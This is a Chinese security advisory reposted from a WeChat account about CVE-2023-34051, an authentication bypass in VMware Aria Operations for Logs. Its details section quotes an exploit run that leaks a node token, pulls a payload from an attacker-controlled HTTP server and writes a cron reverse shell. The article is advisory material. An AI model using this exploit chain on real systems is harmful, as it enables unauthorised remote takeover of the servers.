CVE-2023-34051|VMware Aria Operations for Logs身份验证绕过漏洞

admin 2023年10月27日01:09:18评论33 views字数 1373阅读4分34秒阅读模式



0x00 前言


VMware Aria Operations for Logs(以前称为 vRealize Log Insight)是一款日志分析工具,可提供高度可扩展的异构日志管理功能,具备直观且可操作的仪表板、精细的分析功能和广泛的第三方扩展功能



0x01 漏洞描述


该漏洞源于VMware vRealize Log Insight中对先前发布的VMSA-2023-0001中的多个漏洞修复不足(仅阻止通过IP访问Thrift 服务),导致存在绕过VMSA-2023-0001补丁的身份验证绕过方法。



0x02 CVE编号


CVE-2023-34051



0x03 影响版本

VMware Aria Operations for Logs 8.x < 8.14VMware Cloud Foundation (VMware Aria Operations for Logs) 5.x、4.x


0x04 漏洞详情


$ python3 VMSA-2023-0001.py --target_address 192.168.4.133 --http_server_address 192.168.4.60 --http_server_port 8080 --payload_file payload --payload_path /etc/cron.d/exploit [+] Using CVE-2022-31711 to leak node token[+] Found node token: f261d2f5-71fa-45fd-a0a0-6114a55a8fb8[+] Using CVE-2022-31704 to trigger malicious file download192.168.4.133 - - [30/Jan/2023 16:43:41] "GET /exploit.tar HTTP/1.1" 200 -[+] File successfully downloaded[+] Using CVE-2022-31706 to trigger directory traversal and write cron reverse shell[+] Payload successfully delivered



0x05 参考链接


https://github.com/horizon3ai/CVE-2023-34051


https://www.horizon3.ai/vmware-aria-operations-for-logs-cve-2023-34051-technical-deep-dive-and-iocs/




推荐阅读:


CVE-2023-39361|Cacti 未经身份验证SQL注入漏洞


CVE-2023-42442|JumpServer未授权访问漏洞


CVE-2023-34039|VMware Aria Operations for Networks身份认证绕过漏洞




Ps:国内外安全热点分享,欢迎大家分享、转载,请保证文章的完整性。文章中出现敏感信息和侵权内容,请联系作者删除信息。信息安全任重道远,感谢您的支持CVE-2023-34051|VMware Aria Operations for Logs身份验证绕过漏洞!!!



      本公众号的文章及工具仅提供学习参考,由于传播、利用此文档提供的信息而造成任何直接或间接的后果及损害,均由使用者本人负责,本公众号及文章作者不为此承担任何责任。

CVE-2023-34051|VMware Aria Operations for Logs身份验证绕过漏洞


原文始发于微信公众号(信安百科):CVE-2023-34051|VMware Aria Operations for Logs身份验证绕过漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月27日01:09:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-34051|VMware Aria Operations for Logs身份验证绕过漏洞https://cn-sec.com/archives/2149469.html

发表评论

匿名网友 填写信息